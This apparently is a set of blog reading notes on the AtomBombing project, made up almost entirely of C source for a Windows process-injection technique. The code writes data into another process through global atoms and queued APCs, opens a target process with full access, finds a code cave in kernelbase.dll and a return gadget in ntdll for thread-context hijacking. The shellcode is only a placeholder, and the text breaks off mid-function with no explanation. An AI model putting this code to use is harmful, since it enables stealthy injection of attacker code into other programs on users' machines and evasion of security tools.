AtomBombing
// Github 上开源项目 阅读笔记
#include <stdio.h> #include <Windows.h> #include <TlHelp32.h> #include <winternl.h> #define SHELLCODE ("haha") #define RTL_MAXIMUM_ATOM_LENGTH (255) #define SHELLCODE_FUNCTION_POINTERS_OFFSET (25) #define X86_RET ('\xc3') #define TEXT_SECTION (".text") #define DATA_SECTION (".data") #define NTDLL ("ntdll.dll") #define KERNEL32 ("kernel32.dll") #define NTSETCONTEXTTHREAD ("NtSetContextThread") #define NTWAITFORSINGLEOBJECT ("NtWaitForSingleObject") #define MEMCPY ("memcpy") #define GETPROCADDRESS ("GetProcAddress") #define LOADLIBRARYA ("LoadLibraryA") #define GLOBALGETATOMNAMEW ("GlobalGetAtomNameW") #define NTQUEUEAPCTHREAD ("NtQueueApcThread") #define WAITFORSINGLEOBJECTEX ("WaitForSingleObjectEx") typedef VOID(*PKNORMAL_ROUTINE)(PVOID NormalContext, PVOID SystemArgument1, PVOID SystemArgument2 ); typedef ULONG(WINAPI * _NtQueueApcThread)(HANDLE ThreadHandle, PKNORMAL_ROUTINE ApcRoutine, PVOID NormalContext, PVOID SystemArgument1, PVOID SystemArgument2 ); typedef NTSTATUS(NTAPI *_NtQueryInformationProcess)( HANDLE ProcessHandle, DWORD ProcessInformationClass, PVOID ProcessInformation, DWORD ProcessInformationLength, PDWORD ReturnLength ); #pragma pack(push, 1) typedef struct _FUNCTIONPOINTERS { void *pfnLoadLibraryA; void *pfnGetProcAddress; } FUNCTIONPOINTERS, *PFUNCTIONPOINTERS; #pragma pack(pop) typedef enum _ESTATUS { ESTATUS_INVALID = -1, ESTATUS_SUCCESS = 0, ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPER_NTQUEUEAPCTHREAD_FAILED = 0x100, ESTATUS_MAIN_ADDNULLTERMINATEDATOMANDVERIFYW_GLOBALADDATOMW_FAILED, ESTATUS_MAIN_DOESSTRINGCONTAINNULLTERMINATORW_WCSCHR_FAILED, ESTATUS_MAIN_GETTHREADTEBADDRESS_NTQUERYINFORMATIONTHREAD_ERROR, ESTATUS_MAIN_OPENPROCESSBYNAME_OPENPROCESS_ERROR, ESTATUS_MAIN_GETPROCESSIDBYNAME_CREATETOOLHELP32SNAPSHOT_ERROR, ESTATUS_MAIN_GETPROCESSIDBYNAME_PROCESS32FIRST_ERROR, ESTATUS_MAIN_GETPROCESSIDBYNAME_PROCESS_NOT_FOUND, ESTATUS_MAIN_GETTHREADTEBADDRESS_GETTHREADSELECTORENTRY_FAILED, ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPERANDKEEPALERTABLE_SUSPENDTHREAD_FAILED, ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPERANDKEEPALERTABLE_RESUMETHREAD_FAILED, ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_SUSPENDTHREAD_FAILED, ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_RESUMETHREAD_FAILED, ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_QUEUEUSERAPC_FAILED, ESTATUS_MAIN_APCWRITEPROCESSMEMORYNULLTERMINATEDINTERNAL_BUFFER_CONTAINS_NULL, ESTATUS_MAIN_FINDALERTABLETHREAD_NO_ALERTABLE_THREADS_FOUND, ESTATUS_MAIN_GETTHREADCONTEXT_SUSPENDTHREAD_FAILED, ESTATUS_MAIN_GETTHREADCONTEXT_GETTHREADCONTEXT_FAILED, ESTATUS_MAIN_GETTHREADCONTEXT_RESUMETHREAD_FAILED, ESTATUS_MAIN_GETSECTIONHEADER_SECTION_NOT_FOUND, ESTATUS_MAIN_GETCODECAVEADDRESS_GETMODULEHANDLEA_FAILED, ESTATUS_MAIN_FINDRETGADGET_GETMODULEHANDLEA_FAILED, ESTATUS_MAIN_FINDRETGADGET_RET_GADGET_NOT_FOUND, ESTATUS_GETFUNCTIONADDRESSFROMDLL_GETMODULEHANDLEA_FAILED, ESTATUS_GETFUNCTIONADDRESSFROMDLL_GETPROCADDRESS_FAILED, ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_HEAPALLOC_FAILED, ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_READPROCESSMEMORY_FAILED, ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_READPROCESSMEMORY_MISMATCH, ESTATUS_MAIN_ADDNULLTERMINATEDATOMANDVERIFYW_GLOBALDELETEATOM_FAILED, ESTATUS_MAIN_WASATOMWRITTENSUCCESSFULLY_GLOBALGETATOMNAMEW_FAILED, ESTATUS_MAIN_WASATOMWRITTENSUCCESSFULLY_HEAPALLOC_FAILED, ESTATUS_MAIN_ENUMPROCESSTHREADS_OPENTHREAD_FAILED, ESTATUS_MAIN_FINDALERTABLETHREAD_HEAPALLOC_FAILED, ESTATUS_MAIN_FINDALERTABLETHREAD_HEAPALLOC2_FAILED, ESTATUS_MAIN_FINDALERTABLETHREAD_CREATEEVENT_FAILED, ESTATUS_MAIN_FINDALERTABLETHREAD_DUPLICATEHANDLE_FAILED, ESTATUS_MAIN_FINDALERTABLETHREAD_WAITFORMULTIPLEOBJECTS_FAILED, } ESTATUS, *PESTATUS; #define ESTATUS_FAILED(eStatus) (ESTATUS_SUCCESS != eStatus) ESTATUS GetFunctionAddressFromDll( PSTR pszDllName, PSTR pszFunctionName, PVOID *ppvFunctionAddress ) { HMODULE hModule = NULL; PVOID pvFunctionAddress = NULL; ESTATUS eReturn = ESTATUS_INVALID; hModule = GetModuleHandleA(pszDllName); if (NULL == hModule) { eReturn = ESTATUS_GETFUNCTIONADDRESSFROMDLL_GETMODULEHANDLEA_FAILED; goto lblCleanup; } pvFunctionAddress = GetProcAddress(hModule, pszFunctionName); if (NULL == pvFunctionAddress) { eReturn = ESTATUS_GETFUNCTIONADDRESSFROMDLL_GETPROCADDRESS_FAILED; goto lblCleanup; } *ppvFunctionAddress = pvFunctionAddress; eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_WasAtomWrittenSuccessfully( ATOM tAtom, PWSTR pswzExpectedBuffer, PBOOL pbWasAtomWrittenSuccessfully ) { LPWSTR pswzCheckBuffer = NULL; DWORD cbCheckBuffer = 0; ESTATUS eReturn = ESTATUS_INVALID; UINT uiRet = 0; HMODULE hUser32 = NULL; BOOL bWasAtomWrittenSuccessfully = FALSE; // If user32.dll is not loaded, the ATOM functions return access denied.For more details see : // http://www.tech-archive.net/Archive/Development/microsoft.public.win32.programmer.kernel/2004-03/0851.html hUser32 = LoadLibrary(L"user32.dll"); if (NULL == hUser32) { goto lblCleanup; } cbCheckBuffer = (wcslen(pswzExpectedBuffer) + 1) * sizeof(WCHAR); pswzCheckBuffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cbCheckBuffer); if (NULL == pswzCheckBuffer) { printf("HeapAlloc failed. GLE: 0x%X (%d)\n\n", GetLastError(), GetLastError()); eReturn = ESTATUS_MAIN_WASATOMWRITTENSUCCESSFULLY_HEAPALLOC_FAILED; goto lblCleanup; } uiRet = GlobalGetAtomNameW(tAtom, pswzCheckBuffer, cbCheckBuffer); if (0 == uiRet) { printf("GlobalGetAtomNameA failed. GLE: 0x%X (%d)\n\n", GetLastError(), GetLastError()); eReturn = ESTATUS_MAIN_WASATOMWRITTENSUCCESSFULLY_GLOBALGETATOMNAMEW_FAILED; goto lblCleanup; } bWasAtomWrittenSuccessfully = (0 == memcmp(pswzCheckBuffer, pswzExpectedBuffer, cbCheckBuffer)); eReturn = ESTATUS_SUCCESS; *pbWasAtomWrittenSuccessfully = bWasAtomWrittenSuccessfully; lblCleanup: if (NULL != pswzCheckBuffer) { HeapFree(GetProcessHeap(), 0, pswzCheckBuffer); pswzCheckBuffer = NULL; } return eReturn; } ESTATUS main_AddNullTerminatedAtomAndVerifyW(LPWSTR pswzBuffer, ATOM *ptAtom) { ATOM tAtom = 0; ESTATUS eReturn = ESTATUS_INVALID; LPWSTR pswzCheckBuffer = NULL; DWORD cbCheckBuffer = 0; UINT uiRet = 0; HMODULE hUser32 = NULL; BOOL bWasAtomWrittenSuccessfully = FALSE; // If user32.dll is not loaded, the ATOM functions return access denied. For more details see : // http://www.tech-archive.net/Archive/Development/microsoft.public.win32.programmer.kernel/2004-03/0851.html hUser32 = LoadLibrary(L"user32.dll"); do { tAtom = GlobalAddAtomW(pswzBuffer); if (0 == tAtom) { printf("GlobalAddAtomA failed. GLE: 0x%X (%d)\n\n", GetLastError(), GetLastError()); eReturn = ESTATUS_MAIN_ADDNULLTERMINATEDATOMANDVERIFYW_GLOBALADDATOMW_FAILED; goto lblCleanup; } eReturn = main_WasAtomWrittenSuccessfully(tAtom, pswzBuffer, &bWasAtomWrittenSuccessfully); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } if (FALSE != bWasAtomWrittenSuccessfully) { break; } for (int i = 0; i < 0x2; i++) { SetLastError(ERROR_SUCCESS); GlobalDeleteAtom(tAtom); if (ERROR_SUCCESS != GetLastError()) { eReturn = ESTATUS_MAIN_ADDNULLTERMINATEDATOMANDVERIFYW_GLOBALDELETEATOM_FAILED; goto lblCleanup; } } } while (FALSE == bWasAtomWrittenSuccessfully); eReturn = ESTATUS_SUCCESS; *ptAtom = tAtom; lblCleanup: return eReturn; } ESTATUS main_NtQueueApcThreadWrapper( HANDLE hThread, PKNORMAL_ROUTINE pfnApcRoutine, PVOID pvArg1, PVOID pvArg2, PVOID pvArg3 ) { HMODULE hNtDll = NULL; HMODULE hKernel32 = NULL; HMODULE hUser32 = NULL; _NtQueueApcThread NtQueueApcThread = NULL; NTSTATUS ntStatus = NULL; ESTATUS eReturn = ESTATUS_INVALID; // If user32.dll is not loaded, the ATOM functions return access denied. For more details see: // http://www.tech-archive.net/Archive/Development/microsoft.public.win32.programmer.kernel/2004-03/0851.html hUser32 = LoadLibrary(L"user32.dll"); hKernel32 = GetModuleHandle(L"kernel32.dll"); hNtDll = GetModuleHandle(L"ntdll.dll"); eReturn = GetFunctionAddressFromDll( NTDLL, NTQUEUEAPCTHREAD, (PVOID *)&NtQueueApcThread ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } ntStatus = NtQueueApcThread( hThread, pfnApcRoutine, pvArg1, pvArg2, pvArg3 ); if (0 != ntStatus) { printf("NtQueueApcThread failed. ret: 0x%X (%d)\n\n\n", ntStatus, ntStatus); eReturn = ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPER_NTQUEUEAPCTHREAD_FAILED; goto lblCleanup; } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_NtQueueApcThreadWaitForSingleObjectEx( HANDLE hRemoteThread, HANDLE hWaitHandle, DWORD dwWaitMilliseconds, BOOL bWaitAlertable ) { ESTATUS eReturn = ESTATUS_INVALID; PKNORMAL_ROUTINE pfnWaitForSingleObjectEx = NULL; eReturn = GetFunctionAddressFromDll( KERNEL32, WAITFORSINGLEOBJECTEX, (PVOID *)&pfnWaitForSingleObjectEx ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = main_NtQueueApcThreadWrapper( hRemoteThread, pfnWaitForSingleObjectEx, hWaitHandle, (PVOID)dwWaitMilliseconds, (PVOID)bWaitAlertable ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_QueueUserApcWrapperAndKeepAlertable( HANDLE hThread, PAPCFUNC pfnAPC, ULONG_PTR dwData ) { ESTATUS eReturn = ESTATUS_INVALID; DWORD dwErr = FALSE; dwErr = SuspendThread(hThread); if (((DWORD)-1) == dwErr) { eReturn = ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_SUSPENDTHREAD_FAILED; printf("SuspendThread failed. GLE: %d.", GetLastError()); goto lblCleanup; } dwErr = QueueUserAPC(pfnAPC, hThread, dwData); if (0 == dwErr) { eReturn = ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_QUEUEUSERAPC_FAILED; printf("SuspendThread failed. GLE: %d.", GetLastError()); goto lblCleanup; } eReturn = main_NtQueueApcThreadWaitForSingleObjectEx( hThread, GetCurrentThread(), 5000, TRUE ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } dwErr = ResumeThread(hThread); if (((DWORD)-1) == dwErr) { printf("ResumeThread failed. GLE: %d.", GetLastError()); eReturn = ESTATUS_MAIN_QUEUEUSERAPCWRAPPERANDKEEPALERTABLE_RESUMETHREAD_FAILED; goto lblCleanup; } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_NtQueueApcThreadWrapperAndKeepAlertable( HANDLE hThread, PKNORMAL_ROUTINE pfnApcRoutine, PVOID pvArg1, PVOID pvArg2, PVOID pvArg3 ) { ESTATUS eReturn = ESTATUS_INVALID; DWORD dwErr = FALSE; dwErr = SuspendThread(hThread); if (((DWORD)-1) == dwErr) { eReturn = ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPERANDKEEPALERTABLE_SUSPENDTHREAD_FAILED; printf("SuspendThread failed. GLE: %d.", GetLastError()); goto lblCleanup; } eReturn = main_NtQueueApcThreadWrapper( hThread, pfnApcRoutine, pvArg1, pvArg2, pvArg3 ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = main_NtQueueApcThreadWaitForSingleObjectEx( hThread, GetCurrentThread(), 5000, TRUE ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } dwErr = ResumeThread(hThread); if (((DWORD)-1) == dwErr) { printf("ResumeThread failed. GLE: %d.", GetLastError()); eReturn = ESTATUS_MAIN_NTQUEUEAPCTHREADWRAPPERANDKEEPALERTABLE_RESUMETHREAD_FAILED; goto lblCleanup; } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_ApcSetEventAndKeepAlertable(HANDLE hThread, HANDLE hRemoteHandle) { ESTATUS eReturn = ESTATUS_INVALID; eReturn = main_QueueUserApcWrapperAndKeepAlertable( hThread, (PAPCFUNC)SetEvent, (ULONG_PTR)hRemoteHandle ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_ApcSetThreadContextInternal(HANDLE hThread, PCONTEXT ptContext) { PKNORMAL_ROUTINE pfnSetThreadContext = NULL; ESTATUS eReturn = ESTATUS_INVALID; eReturn = GetFunctionAddressFromDll( NTDLL, NTSETCONTEXTTHREAD, (PVOID *)&pfnSetThreadContext ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = main_NtQueueApcThreadWrapper( hThread, pfnSetThreadContext, GetCurrentThread(), (PVOID)ptContext, (PVOID)NULL ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_DoesStringContainNullTerminatorW( PVOID pvBuffer, DWORD dwBufferSize, PBOOL pbDoesStringContainUnicodeNullTerminator ) { PWCHAR pwcPos = NULL; ESTATUS eReturn = ESTATUS_INVALID; pwcPos = wcschr((LPWSTR)pvBuffer, UNICODE_NULL); if (0 == pwcPos) { eReturn = ESTATUS_MAIN_DOESSTRINGCONTAINNULLTERMINATORW_WCSCHR_FAILED; goto lblCleanup; } if ((DWORD)(pwcPos - (PWCHAR)pvBuffer) == (dwBufferSize / sizeof(WCHAR) - 1)) { *pbDoesStringContainUnicodeNullTerminator = FALSE; } else { *pbDoesStringContainUnicodeNullTerminator = TRUE; } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_ApcWriteProcessMemoryNullTerminatedInternal( HANDLE hThread, PVOID pvBaseAddress, PVOID pvBuffer, DWORD dwBufferSize ) { ESTATUS eReturn = ESTATUS_INVALID; DWORD dwIndex = 0; HMODULE hKernel32 = NULL; PKNORMAL_ROUTINE pfnGlobalGetAtomNameW = NULL; BOOL bDoesStringContainUnicodeNullTerminator = FALSE; hKernel32 = GetModuleHandle(L"kernel32.dll"); eReturn = GetFunctionAddressFromDll( KERNEL32, GLOBALGETATOMNAMEW, (PVOID *)&pfnGlobalGetAtomNameW ); eReturn = main_DoesStringContainNullTerminatorW( pvBuffer, dwBufferSize, &bDoesStringContainUnicodeNullTerminator ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } if (FALSE != bDoesStringContainUnicodeNullTerminator) { eReturn = ESTATUS_MAIN_APCWRITEPROCESSMEMORYNULLTERMINATEDINTERNAL_BUFFER_CONTAINS_NULL; goto lblCleanup; } for (dwIndex = 0; dwIndex < dwBufferSize; dwIndex += (RTL_MAXIMUM_ATOM_LENGTH) * sizeof(WCHAR)) { ATOM tAtom = 0; CHAR acBuffer[(RTL_MAXIMUM_ATOM_LENGTH + 1) * sizeof(WCHAR)] = { 0 }; DWORD cbBlockSize = 0; if ((dwBufferSize - sizeof(WCHAR)) - dwIndex < (sizeof(acBuffer) - sizeof(WCHAR))) { cbBlockSize = ((dwBufferSize - sizeof(WCHAR)) - dwIndex); } else { cbBlockSize = sizeof(acBuffer) - sizeof(WCHAR); } (VOID)memcpy(acBuffer, (PVOID)((DWORD)pvBuffer + dwIndex), cbBlockSize); eReturn = main_AddNullTerminatedAtomAndVerifyW((LPWSTR)acBuffer, &tAtom); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = main_NtQueueApcThreadWrapperAndKeepAlertable( hThread, pfnGlobalGetAtomNameW, (PVOID)tAtom, ((PUCHAR)pvBaseAddress) + dwIndex, (PVOID)(cbBlockSize + sizeof(WCHAR)) ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_IsProcessMemoryEqual( HANDLE hProcess, PVOID pvRemoteAddress, PVOID pvExpectedBuffer, DWORD cbExpectedBufferSize, PBOOL pbIsMemoryEqual ) { ESTATUS eReturn = ESTATUS_INVALID; PVOID pvTempBuffer = NULL; DWORD dwNumberOfBytesRead = 0; BOOL bErr = FALSE; BOOL bIsMemoryEqual = FALSE; pvTempBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cbExpectedBufferSize); if (NULL == pvTempBuffer) { eReturn = ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_HEAPALLOC_FAILED; goto lblCleanup; } bErr = ReadProcessMemory( hProcess, pvRemoteAddress, pvTempBuffer, cbExpectedBufferSize, &dwNumberOfBytesRead ); if (FALSE == bErr) { eReturn = ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_READPROCESSMEMORY_FAILED; printf("ReadProcessMemory error. GLE: %d.", GetLastError()); goto lblCleanup; } if (dwNumberOfBytesRead != cbExpectedBufferSize) { eReturn = ESTATUS_MAIN_ISPROCESSMEMORYEQUAL_READPROCESSMEMORY_MISMATCH; goto lblCleanup; } if (0 == memcmp(pvTempBuffer, pvExpectedBuffer, cbExpectedBufferSize)) { bIsMemoryEqual = TRUE; } eReturn = ESTATUS_SUCCESS; *pbIsMemoryEqual = bIsMemoryEqual; lblCleanup: if (NULL != pvTempBuffer) { HeapFree(GetProcessHeap(), 0, pvTempBuffer); pvTempBuffer = NULL; } return eReturn; } ESTATUS main_ApcWriteProcessMemoryNullTerminated( HANDLE hProcess, HANDLE hThread, PVOID pvBaseAddress, PVOID pvBuffer, DWORD dwBufferSize ) { ESTATUS eReturn = ESTATUS_INVALID; BOOL bShouldStop = FALSE; do { eReturn = main_ApcWriteProcessMemoryNullTerminatedInternal( hThread, pvBaseAddress, pvBuffer, dwBufferSize ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } Sleep(100); eReturn = main_IsProcessMemoryEqual( hProcess, pvBaseAddress, pvBuffer, dwBufferSize, &bShouldStop ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } if (FALSE == bShouldStop) { printf("[*] Data chunk written incorrectly, retrying...\n\n\n"); } } while (FALSE == bShouldStop); eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_ApcWriteProcessMemoryInternal( HANDLE hProcess, HANDLE hThread, PVOID pvBaseAddress, PVOID pvBuffer, DWORD dwBufferSize ) { PWCHAR pwcPos = NULL; ESTATUS eReturn = ESTATUS_INVALID; PVOID pvTempBuffer = NULL; PVOID pvLocalBufferPointer = pvBuffer; PVOID pvRemoteBufferPointer = pvBaseAddress; DWORD dwBytesWritten = 0; while (pvLocalBufferPointer < (PUCHAR)pvBuffer + dwBufferSize) { DWORD cbTempBufferSize = 0; pwcPos = (PWCHAR)pvLocalBufferPointer + wcsnlen_s( (LPWSTR)pvLocalBufferPointer, (dwBufferSize - dwBytesWritten) / sizeof(WCHAR) ); if (0 == pwcPos) { goto lblCleanup; } if (pvLocalBufferPointer == pwcPos) { pvRemoteBufferPointer = (PUCHAR)pvRemoteBufferPointer + sizeof(UNICODE_NULL); pvLocalBufferPointer = (PUCHAR)pvLocalBufferPointer + sizeof(UNICODE_NULL); dwBytesWritten += sizeof(UNICODE_NULL); continue; } cbTempBufferSize = (PUCHAR)pwcPos - (PUCHAR)pvLocalBufferPointer; pvTempBuffer = HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, cbTempBufferSize + sizeof(UNICODE_NULL) ); if (NULL == pvTempBuffer) { goto lblCleanup; } memcpy(pvTempBuffer, pvLocalBufferPointer, cbTempBufferSize); eReturn = main_ApcWriteProcessMemoryNullTerminated( hProcess, hThread, pvRemoteBufferPointer, pvTempBuffer, cbTempBufferSize + sizeof(UNICODE_NULL) ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } pvRemoteBufferPointer = (PUCHAR)pvRemoteBufferPointer + cbTempBufferSize; pvLocalBufferPointer = (PUCHAR)pvLocalBufferPointer + cbTempBufferSize; dwBytesWritten += cbTempBufferSize; if (NULL != pvTempBuffer) { HeapFree(GetProcessHeap(), 0, pvTempBuffer); pvTempBuffer = NULL; } } eReturn = ESTATUS_SUCCESS; lblCleanup: if (NULL != pvTempBuffer) { HeapFree(GetProcessHeap(), 0, pvTempBuffer); pvTempBuffer = NULL; } return eReturn; } ESTATUS main_ApcWriteProcessMemory( HANDLE hProcess, HANDLE hThread, PVOID pvBaseAddress, PVOID pvBuffer, DWORD dwBufferSize ) { ESTATUS eReturn = ESTATUS_INVALID; BOOL bShouldStop = FALSE; do { eReturn = main_ApcWriteProcessMemoryInternal( hProcess, hThread, pvBaseAddress, pvBuffer, dwBufferSize ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } Sleep(100); eReturn = main_IsProcessMemoryEqual( hProcess, pvBaseAddress, pvBuffer, dwBufferSize, &bShouldStop ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } if (bShouldStop) { printf("[*] New verification: Data chunk written successfully.\n\n\n"); break; } printf("[*] New Verification: Data written incorrectly, retrying...\n\n\n"); } while (TRUE); eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_ApcSetThreadContext( HANDLE hProcess, HANDLE hThread, PCONTEXT ptContext, PVOID pvRemoteAddress ) { ESTATUS eReturn = ESTATUS_INVALID; eReturn = main_ApcWriteProcessMemory( hProcess, hThread, (PVOID)((PUCHAR)pvRemoteAddress), ptContext, FIELD_OFFSET(CONTEXT, ExtendedRegisters) ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = main_ApcSetThreadContextInternal(hThread, (PCONTEXT)((PUCHAR)pvRemoteAddress)); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_ApcCopyFunctionPointers( HANDLE hProcess, HANDLE hThread, PVOID pvRemoteAddress ) { ESTATUS eReturn = ESTATUS_INVALID; FUNCTIONPOINTERS tFunctionPointers = { 0 }; eReturn = GetFunctionAddressFromDll( KERNEL32, LOADLIBRARYA, &tFunctionPointers.pfnLoadLibraryA ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = GetFunctionAddressFromDll( KERNEL32, GETPROCADDRESS, &tFunctionPointers.pfnGetProcAddress ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = main_ApcWriteProcessMemory( hProcess, hThread, pvRemoteAddress, &tFunctionPointers, sizeof(tFunctionPointers) ); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_GetProcessIdByName(LPWSTR pszProcessName, PDWORD pdwProcessId) { DWORD dwProcessId = 0; HANDLE hSnapshot = NULL; PROCESSENTRY32 pe = { 0 }; ESTATUS eReturn = ESTATUS_INVALID; hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (NULL == hSnapshot) { eReturn = ESTATUS_MAIN_GETPROCESSIDBYNAME_CREATETOOLHELP32SNAPSHOT_ERROR; printf("CreateToolhelp32Snapshot error. GLE: %d.", GetLastError()); goto lblCleanup; } pe.dwSize = sizeof(PROCESSENTRY32); if (FALSE == Process32First(hSnapshot, &pe)) { eReturn = ESTATUS_MAIN_GETPROCESSIDBYNAME_PROCESS32FIRST_ERROR; printf("Process32First error. GLE: %d.", GetLastError()); goto lblCleanup; } do { if (NULL != wcsstr(pe.szExeFile, pszProcessName)) { dwProcessId = pe.th32ProcessID; break; } } while (Process32Next(hSnapshot, &pe)); if (0 == dwProcessId) { printf("[*] Process '%S' could not be found.\n\n\n", pszProcessName); eReturn = ESTATUS_MAIN_GETPROCESSIDBYNAME_PROCESS_NOT_FOUND; goto lblCleanup; } printf("[*] Found process '%S'. PID: %d (0x%X).\n\n\n", pszProcessName, dwProcessId, dwProcessId); *pdwProcessId = dwProcessId; eReturn = ESTATUS_SUCCESS; lblCleanup: if ((NULL != hSnapshot) && (INVALID_HANDLE_VALUE != hSnapshot)) { CloseHandle(hSnapshot); hSnapshot = NULL; } return eReturn; } ESTATUS main_OpenProcessByName(LPWSTR pszProcessName, PHANDLE phProcess) { HANDLE hProcess = NULL; ESTATUS eReturn = ESTATUS_INVALID; DWORD dwPid = 0; eReturn = main_GetProcessIdByName(pszProcessName, &dwPid); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPid ); if (NULL == hProcess) { eReturn = ESTATUS_MAIN_OPENPROCESSBYNAME_OPENPROCESS_ERROR; printf("OpenProcess error. GLE: %d.", GetLastError()); goto lblCleanup; } printf("[*] Opened process's handle: %d (0x%X).\n\n\n", hProcess, hProcess); *phProcess = hProcess; eReturn = ESTATUS_SUCCESS; lblCleanup: return eReturn; } ESTATUS main_GetSectionHeader( HMODULE hModule, PSTR pszSectionName, PIMAGE_SECTION_HEADER *pptSectionHeader ) { PIMAGE_DOS_HEADER ptDosHeader = NULL; PIMAGE_NT_HEADERS ptNtHeaders = NULL; PIMAGE_SECTION_HEADER ptSectionHeader = NULL; ESTATUS eReturn = ESTATUS_INVALID; BOOL bFound = FALSE; ptDosHeader = (PIMAGE_DOS_HEADER)hModule; if (IMAGE_DOS_SIGNATURE != ptDosHeader->e_magic) { goto lblCleanup; } ptNtHeaders = (PIMAGE_NT_HEADERS)(((DWORD)ptDosHeader) + (PUCHAR)ptDosHeader->e_lfanew); if (FALSE != IsBadReadPtr(ptNtHeaders, sizeof(IMAGE_NT_HEADERS))) { goto lblCleanup; } if (IMAGE_NT_SIGNATURE != ptNtHeaders->Signature) { goto lblCleanup; } ptSectionHeader = IMAGE_FIRST_SECTION(ptNtHeaders); for (int i = 0; i < ptNtHeaders->FileHeader.NumberOfSections; i++) { if (0 == strncmp(pszSectionName, (PCHAR)ptSectionHeader->Name, IMAGE_SIZEOF_SHORT_NAME)) { bFound = TRUE; break; } ptSectionHeader++; } if (FALSE == bFound) { eReturn = ESTATUS_MAIN_GETSECTIONHEADER_SECTION_NOT_FOUND; goto lblCleanup; } eReturn = ESTATUS_SUCCESS; *pptSectionHeader = ptSectionHeader; lblCleanup: return eReturn; } ESTATUS main_GetCodeCaveAddress(PVOID *ppvCodeCave) { PIMAGE_SECTION_HEADER ptSectionHeader = NULL; PVOID pvCodeCave = NULL; ESTATUS eReturn = ESTATUS_INVALID; HMODULE hNtDll = NULL; hNtDll = GetModuleHandleA("kernelbase.dll"); if (NULL == hNtDll) { eReturn = ESTATUS_MAIN_GETCODECAVEADDRESS_GETMODULEHANDLEA_FAILED; } eReturn = main_GetSectionHeader(hNtDll, DATA_SECTION, &ptSectionHeader); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } pvCodeCave = (PVOID)( (DWORD)hNtDll + ptSectionHeader->VirtualAddress + ptSectionHeader->SizeOfRawData ); eReturn = ESTATUS_SUCCESS; *ppvCodeCave = pvCodeCave; lblCleanup: return eReturn; } ESTATUS main_FindRetGadget(PVOID *ppvRetGadget) { PIMAGE_SECTION_HEADER ptSectionHeader = NULL; PVOID pvCodeCave = NULL; ESTATUS eReturn = ESTATUS_INVALID; HMODULE hNtDll = NULL; PVOID pvRetGadget = NULL; hNtDll = GetModuleHandleA(NTDLL); if (NULL == hNtDll) { eReturn = ESTATUS_MAIN_FINDRETGADGET_GETMODULEHANDLEA_FAILED; } eReturn = main_GetSectionHeader(hNtDll, TEXT_SECTION, &ptSectionHeader); if (ESTATUS_FAILED(eReturn)) { goto lblCleanup; } pvRetGadget = memchr( hNtDll + ptSectionHeader->VirtualAddress, X86_RET, ptSectionHeader->SizeOfRawData ); if (NULL == pvRetGadget) { eReturn = ESTATUS_MAIN_FINDRETGADGET_RET_GADGET_NOT_FOUND; goto lblCleanup; } eReturn = ESTATUS_SUCCESS; *ppvRetGadget = pvRetGadget; 